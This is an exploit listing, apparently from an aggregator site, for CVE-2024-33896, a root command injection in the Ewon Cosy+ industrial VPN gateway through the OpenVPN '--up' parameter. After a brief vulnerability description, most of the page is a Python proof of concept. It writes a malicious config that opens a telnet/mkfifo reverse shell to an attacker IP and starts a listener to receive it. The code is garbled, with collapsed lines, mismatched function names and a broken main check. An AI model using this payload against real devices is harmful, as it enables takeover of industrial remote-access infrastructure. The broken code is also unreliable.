Exploit for Cosy+ 21.2s7 Command Injection CVE-2024-33896

Name: Exploit for Cosy+ 21.2s7 Command Injection CVE-2024-33896
Rating: 5 (72 reviews)
2025-04-10 | CVSS 7.2
## https://sploitus.com/exploit?id=PACKETSTORM:190394
Hey,
    
    Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
    maintenance in industrial environments. The manufacturer describes the
    product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
    VPN connection between the machine (PLC, HMI, or other devices) and the
    remote engineer. The connection happens through Talk2m, a highly secured
    industrial cloud service. The Ewon Cosy+ makes industrial remote access
    easy and secure like never before!" Due to improper neutralization of
    parameters read from a user-controlled configuration file, an authenticated
    attacker is able to inject and execute OS commands on the device.
    
    Vulnerability Details: Authenticated attackers are able to upload a custom
    OpenVPN configuration. This configuration can contain the OpenVPN
    paramaters "--up" and "--down", which execute a specified script or
    executable. Since the process itself runs with the highest privileges
    (root), this allows the device to be completely compromised.
    
    
    PoC:
    # Exploit Title: Ewon Cosy+ Command Injection
    # Google Dork: N/A
    # Date: 2024-8-20
    # Exploit Author: CodeB0ss
    # Contact: t.me/codeb0ss / uncodeboss@gmail.com
    # Version: 21.2s7
     # Tested on: Windows 11 Home Edition
     # CVE: CVE-2024-33896
    
    
    import socket
    import subprocess
    import time
    
    def configcreator(file_path):
     with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
    proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
    $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
    l3st(port): server_socket = socket.socket(socket.AF_INET,
    socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
    server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
    client_socket, _ = server_socket.accept() print(" - --> Recevied") while
    True: data = client_socket.recv(1024) if not data: break
    print(data.decode()) client_socket.close() server_socket.close() if name ==
    "main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
    5000 listener_process = subprocess.Popen(['python', '-c', f'from main
    import start_listener; start_listener({port})']) time.sleep(2)
    create_malicious_openvpn_config(config) print(f" - --> config_created
    {config}")
    
    
    GitHub:
    https://github.com/codeb0ss/CVE-2024-33896-PoC